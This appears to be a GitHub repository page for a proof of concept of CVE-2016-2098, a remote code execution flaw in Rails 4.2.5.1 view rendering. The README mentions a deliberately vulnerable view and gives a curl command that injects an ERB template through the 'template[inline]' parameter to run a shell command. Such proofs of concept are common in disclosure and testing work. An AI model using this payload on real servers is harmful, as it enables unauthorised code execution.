- rails 4.2.5.1
- view has a vulnerable code
app/views/poc/render1.html.erb - following command will cause remote code execution
$ curl '<your_host>:3000/poc/render1?template\[inline\]=<%25%3d`sleep+5`%25>'
CyberDefenseInstitute/PoC_CVE-2016-2098_Rails42
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
About
A PoC of CVE-2016-2098 (rails4.2.5.1 / view render)
Topics
Resources
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published